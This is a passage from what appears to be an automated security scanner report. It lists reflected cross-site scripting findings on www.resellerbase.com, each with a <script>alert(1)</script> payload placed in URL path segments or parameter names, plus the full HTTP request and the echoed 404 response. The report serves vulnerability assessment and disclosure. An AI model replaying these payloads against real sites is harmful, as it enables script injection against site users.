The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 23d8e<script>alert(1)</script>9bace986d97 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating23d8e<script>alert(1)</script>9bace986d97/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating23d8e<script>alert(1)</script>9bace986d97/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.228. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4fd57<script>alert(1)</script>d833e57e91 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes4fd57<script>alert(1)</script>d833e57e91/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes4fd57<script>alert(1)</script>d833e57e91/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.229. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ce57f<script>alert(1)</script>ea19126f4ea was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmosce57f<script>alert(1)</script>ea19126f4ea/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmosce57f<script>alert(1)</script>ea19126f4ea/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.230. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7edfb<script>alert(1)</script>d0a8f0849d1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images7edfb<script>alert(1)</script>d0a8f0849d1/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images7edfb<script>alert(1)</script>d0a8f0849d1/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.231. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 4d3d7<script>alert(1)</script>874785db1a7 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/rating4d3d7<script>alert(1)</script>874785db1a7/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/rating4d3d7<script>alert(1)</script>874785db1a7/0.gif was not found on this server.</p>
...[SNIP]...

2.232. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/0.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload bbbb6<script>alert(1)</script>4aa9ad9e3d3 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/rating/0.gifbbbb6<script>alert(1)</script>4aa9ad9e3d3 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/rating/0.gifbbbb6<script>alert(1)</script>4aa9ad9e3d3 was not found on this server.</p>
...[SNIP]...

2.233. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c06f8<script>alert(1)</script>9b4a371687 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/rating/0.gif?c06f8<script>alert(1)</script>9b4a371687=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/rating/0.gif?c06f8<script>alert(1)</script>9b4a371687=1 was not found on this server.</p>
...[SNIP]...

2.234. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/4half.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f8193<script>alert(1)</script>84b455883c6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adultf8193<script>alert(1)</script>84b455883c6/personals-dating/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultf8193<script>alert(1)</script>84b455883c6/personals-dating/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.235. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/4half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1c64a<script>alert(1)</script>71965dd310c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating1c64a<script>alert(1)</script>71965dd310c/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating1c64a<script>alert(1)</script>71965dd310c/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.236. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/4half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6c37c<script>alert(1)</script>04332e9b7bd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes6c37c<script>alert(1)</script>04332e9b7bd/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes6c37c<script>alert(1)</script>04332e9b7bd/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.237. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/4half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6bda4<script>alert(1)</script>3463ebfc882 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos6bda4<script>alert(1)</script>3463ebfc882/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos6bda4<script>alert(1)</script>3463ebfc882/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.238. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/4half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d25eb<script>alert(1)</script>f186917ffcb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/imagesd25eb<script>alert(1)</script>f186917ffcb/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/imagesd25eb<script>alert(1)</script>f186917ffcb/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.239. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/4half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f76f2<script>alert(1)</script>14d4506a915 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/ratingf76f2<script>alert(1)</script>14d4506a915/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/ratingf76f2<script>alert(1)</script>14d4506a915/4half.gif was not found on this server.</p>
...[SNIP]...

2.240. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/4half.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 91d29<script>alert(1)</script>78187251882 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/rating/4half.gif91d29<script>alert(1)</script>78187251882 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/rating/4half.gif91d29<script>alert(1)</script>78187251882 was not found on this server.</p>
...[SNIP]...

2.241. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/rating/4half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a1b73<script>alert(1)</script>5a3af24b186 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/images/rating/4half.gif?a1b73<script>alert(1)</script>5a3af24b186=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/images/rating/4half.gif?a1b73<script>alert(1)</script>5a3af24b186=1 was not found on this server.</p>
...[SNIP]...

2.242. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 57f48<script>alert(1)</script>634782d18e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult57f48<script>alert(1)</script>634782d18e6/personals-dating/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult57f48<script>alert(1)</script>634782d18e6/personals-dating/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.243. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 27596<script>alert(1)</script>edfb4df41fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating27596<script>alert(1)</script>edfb4df41fb/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating27596<script>alert(1)</script>edfb4df41fb/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.244. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload eb0ac<script>alert(1)</script>97ca728ddbe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themeseb0ac<script>alert(1)</script>97ca728ddbe/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themeseb0ac<script>alert(1)</script>97ca728ddbe/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.245. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8af4c<script>alert(1)</script>68964381781 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos8af4c<script>alert(1)</script>68964381781/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

